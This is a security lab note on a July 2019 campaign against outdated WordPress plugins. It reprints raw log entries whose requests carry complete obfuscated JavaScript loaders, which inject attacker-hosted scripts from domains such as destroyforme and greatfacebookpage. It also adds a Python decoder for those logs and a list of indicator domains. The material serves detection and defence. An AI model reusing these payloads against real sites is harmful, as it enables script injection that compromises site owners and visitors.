Plugins Under Attack: July 2019

Labs Note

A long-running malware campaign targeting deprecated, vulnerable versions of plugins continues to be leveraged by attackers to inject malicious scripts into affected websites.

This month they added seven new plugins and continued attacking old ones.

Plugins targeted: July 2019

Plugins that are continuing to be leveraged by attackers for months are:


Payloads added to the campaign


WordPress Plugin Appointment Booking Calendar

185.225.16.152 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [22/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1" 

myStickymenu

185.225.16.152 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [11/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

File Manager

192.169.157.142 - - [23/Jul/2019] "GET /wp-admin/admin-ajax.php?action=mk_file_folder_manager&_wpnonce=1589e1018d&cmd=open&target=&init=1&tree=1&_=1535229962392 HTTP/1.1"

Appointment Booking Calendar

192.169.157.142 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea=var+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B&save=Submit [26/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"

Folders

192.169.157.142 - type=attachment&width=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-ajax.php?action=wcp_change_post_width HTTP/1.1"

Simple Staff List

192.169.157.142 - _staff_listing_default_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B+var+tb+%3D+String.fromCharCode%28116%2C+101%2C+120%2C+116%2C+47%2C+106%2C+97%2C+118%2C+97%2C+115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3Bvar+lb+%3D+String.fromCharCode%28103%2C+114%2C+101%2C+97%2C+116%2C+102%2C+97%2C+99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E [26/Jul/2019] "POST /wp-admin/admin-post.php?action=save&updated=true HTTP/1.1"

Mobile App

192.169.157.142 - canvas_editor_css=%3C%2Fstyle%3E%3Cscript++async%3Dtrue+type%3Dtext%2Fjavascript+language%3Djavascript%3Evar+nt+%3D+String.fromCharCode%2857%29%3Bvar+mb+%3D+String.fromCharCode%2897%2C+106%2C+97%2C+120%2C+67%2C+111%2C+117%2C+110%2C+116%2C+101%2C+114%29%3Bvar+sb+%3D+String...skipped...99%2C+101%2C+98%2C+111%2C+111%2C+107%2C+112%2C+97%2C+103%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+100%2C+108%2C+116%2C+111%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3Bvar+c%3Ddocument.createElement%28sb%29%3Bc.type%3Dtb%2Cc.async%3D1%2Cc.src%3Djb%2Blb%2Bnt%3Bvar+n%3Ddocument.getElementsByTagName%28sb%29%5B0%5D%3Bn.parentNode.insertBefore%28c%2Cn%29%3B%3C%2Fscript%3E%3Cstyle%3E&ssn_submit=1 [26/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"
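Every payload above is the same loader: variables built with String.fromCharCode are concatenated into a script src and inserted before the first script tag. As an added example (not code from the original post), the following Python decoder takes one of these access-log entries, percent-decodes the POST body, resolves the fromCharCode variables and reports which parameter carried the loader and what URL it loads; the embedded sample is an abridged copy of the first Appointment Booking Calendar entry on this page.

```python
import re
from urllib.parse import parse_qs

# Abridged copy of this page's first log entry (Appointment Booking Calendar):
# the POST body exactly as logged, with the loader's unused variables dropped.
SAMPLE_LOG = (
    "185.225.16.152 - CP_ABC_post_edition=1&cfwpp_edit=js&editionarea="
    "var+nt+%3D+String.fromCharCode%2857%2C+57%2C57%29%3B"
    "var+sb+%3D+String.fromCharCode%28115%2C+99%2C+114%2C+105%2C+112%2C+116%29%3B"
    "var+jb+%3D+String.fromCharCode%28104%2C+116%2C+116%2C+112%2C+115%2C+58%2C+47%2C+47%29%3B"
    "var+lb+%3D+String.fromCharCode%28100%2C+101%2C+115%2C+116%2C+114%2C+111%2C+121%2C"
    "+102%2C+111%2C+114%2C+109%2C+101%2C+46%2C+99%2C+111%2C+109%2C+47%2C+115%2C+116%2C"
    "+97%2C+121%2C+46%2C+106%2C+115%2C+63%2C+116%2C+61%2C+112%2C+38%2C+97%2C+61%29%3B"
    "var+c%3Ddocument.createElement%28sb%29%3Bc.src%3Djb%2Blb%2Bnt%3B"
    '&save=Submit [22/Jul/2019] "POST /wp-admin/admin-post.php HTTP/1.1"'
)

ASSIGN = re.compile(r"var\s+(\w+)\s*=\s*String\.fromCharCode\(([\d,\s]+)\)")
CREATE = re.compile(r"createElement\((\w+)\)")
SRC = re.compile(r"\.src\s*=\s*([\w+]+)")

def decode_charcodes(args: str) -> str:
    """'104, 116, 116' -> 'htt': undo the String.fromCharCode() encoding."""
    return "".join(chr(int(n)) for n in args.split(","))

def extract_params(log_line: str) -> dict:
    """POST body (between 'IP - ' and ' [dd/Mon/yyyy]') as {param: value}."""
    body = log_line.split(" [", 1)[0].split(" - ", 1)[-1]
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}

def analyse(log_line: str):
    """Locate the obfuscated loader in the body and resolve what it loads; None if absent."""
    for param, value in extract_params(log_line).items():
        names = {n: decode_charcodes(a) for n, a in ASSIGN.findall(value)}
        src = SRC.search(value)
        if not names or not src:
            continue
        elem = CREATE.search(value)
        return {
            "param": param,
            "element": names.get(elem.group(1), elem.group(1)) if elem else None,
            "src": "".join(names.get(p, p) for p in src.group(1).split("+")),
            # The admin-ajax and Simple Staff List variants close a <style> first.
            "breaks_out_of_style": "</style><script" in value.lower(),
        }
    return None
```

Running the other entries on this page through analyse() resolves the greatfacebookpage[.]com loader in the same way, and the wcp_change_post_width variants set breaks_out_of_style, which is the signal to alert on in saved plugin settings.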


Malicious Domains and IPs:

IPs:


Domains Injected:

  • greatfacebookpage[.]com
  • greatinstagrampage[.]com
  • destroyforme[.]com

As always, we strongly encourage you to keep your software up to date to prevent infection. You can add a WAF as a second layer of protection to virtually patch these vulnerabilities.
